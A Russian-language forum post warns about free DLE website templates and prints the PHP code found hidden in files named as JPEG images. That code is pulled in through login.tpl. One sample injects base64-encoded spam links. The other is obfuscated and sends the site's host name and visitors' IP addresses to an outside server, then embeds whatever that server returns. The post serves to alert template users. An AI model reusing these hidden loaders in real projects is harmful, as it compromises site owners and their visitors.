Ахтунг ! Халявные шаблоны DLE.

Заранее извиняюсь за много буковок :crazy:

Собственно решил я сегодня поковырять/изучить новый для себя двиг. DLE. Качнул, естественно, зануленную версию (ибо только ради тестов покупать пока как то не айс). Поставил. Покрутил ... в общем это все присказка, сказка дальше.

Решил поставить какой-нибудь шаблончик красивый. Накачал кучу разных бесплатных. Но так как я свято верю, что бесплатный сыр бывает только в мышеловке, решил я поковырять свежескаченное.

Итак, первый шаблон. Называется Serenity, скачан на популярном ресурсе. Пробежался по коду всех файлов. Вроде ничего страшного (на первый взгляд). Странно. Ладно, решил посмотреть картинки (папочка images). Все прикольно, только вот все файлы гифы и пнг, а один (dle_sideblock.jpg) жипег. Да еще и просматриваться не хочет :gm: Ну раз не хочет картинкой смотреться, глянем блокнотом что у него внутри. Какой странный код для картинки:

<? function _1245523244($i){$a=Array('PGEgaHJlZj0iaHR0cDovL2ZvcnBvcnRhbC5ydS8iPsc8L2E+PGEgaHJlZj0iP2RvPWxvc3RwYXNzd29yZCI+4OH76+gg7+Dw7uv8PzwvYT4=','','PGEgaHJlZj0iaHR0cDovL2ZpbG1hNG9rLnJ1LyI+xzwvYT48YSBocmVmPSI/ZG89bG9zdHBhc3N3b3JkIj7g4fvr6CDv4PDu6/w/PC9hPg==','','','','PGEgaHJlZj0iaHR0cDovL2thLTRuaS5ydS8iPsc8L2E+PGEgaHJlZj0iP2RvPWxvc3RwYXNzd29yZCI+4OH76+gg7+Dw7uv8PzwvYT4=','PGEgaHJlZj0iLz9kbz1yZWdpc3RlciI+x+Dh++voIO/g8O7r/D88L2E+');return base64_decode($a[$i]);} ?><?php if($newsid!=0){$login_p=_1245523244(0);}else{if($category!=_1245523244(1)){$login_p=_1245523244(2);}else{if($year!=_1245523244(3)&& $month!=_1245523244(4)&& $day!=_1245523244(5)){$login_p=_1245523244(6);}else{$login_p=_1245523244(7);}}} ?>

расшифровывать не буду, ибо особого криминала (в этом шаблоне) вроде нет =) Вот одно из расшифровок:

<a href="http://filma4ok.ru/">&#65533;</a><a href="?do=lostpassword">&#65533;&#65533;&#65533;&#65533;&#65533; &#65533;&#65533;&#65533;&#65533;&#65533;&#65533;?</a>

Теперь я стал судорожно вспоминать где же я видел включение этого файла в шаблон. Опять перелопатил *.tpl .... да вот же он родимый. Файл login.tpl, а в нем код

include ($tpl->dir.'/images/dle_sideblock.jpg');

В общем круг замкнулся. С этим шаблоном все понятно.

Берем следующий. WT Ambience. Тоже скачан с известного ресурса.

Лезем сразу в картиночки. Упс ... nav-hover.jpg нефига не картинка:

<?php 

 $x0f="f\x69le"; $x10="\146\x73\x6f\x63\153\x6f\160\x65\156"; $x11="\x69\155\x70l\x6f\144\x65"; 

 $x0b = @$x10("\x65\162\157r\150\x6fs\1642\056\162\165", 80, $x0c, $x0d, 6); if(!$x0b){return ''; }else{ $x0e = @$x0f("\150t\164\x70\072\057/\145r\157r\x68\157\163\x742.\162\x75\057\151\144\063\056\x70\x68\x70\x3f\x73\x69te\x3d$_SERVER[HTTP_HOST]\046i\160\x3d$_SERVER[REMOTE_ADDR]"); return $x11('',$x0e); }?>

Хм ... забавно ... вообще лень разбираться, что здесь происходит. Но явно ничего хорошего.

Суемся по старой схеме в login.tpl и наблюдаем так код:

$void = include ($tpl->dir.'/images/nav-hover.jpg');

$get_good = $void;



if (isset($get_good) == true)

{ 

$login_panel = $void;

$login_panel .= <<<HTML

Там еще много всякого забавного кода, весь приводить не буду, кому интересно, расковыряют сами.

В общем, господа хорошие, этим постом я как бе хотел показать, что нехороших людей на свете много и если уж вы пользуетесь халявными шаблонами, не ленитесь, проверяйте их. И дай Бог тем типа этой или этой станет поменьше.

Аминь.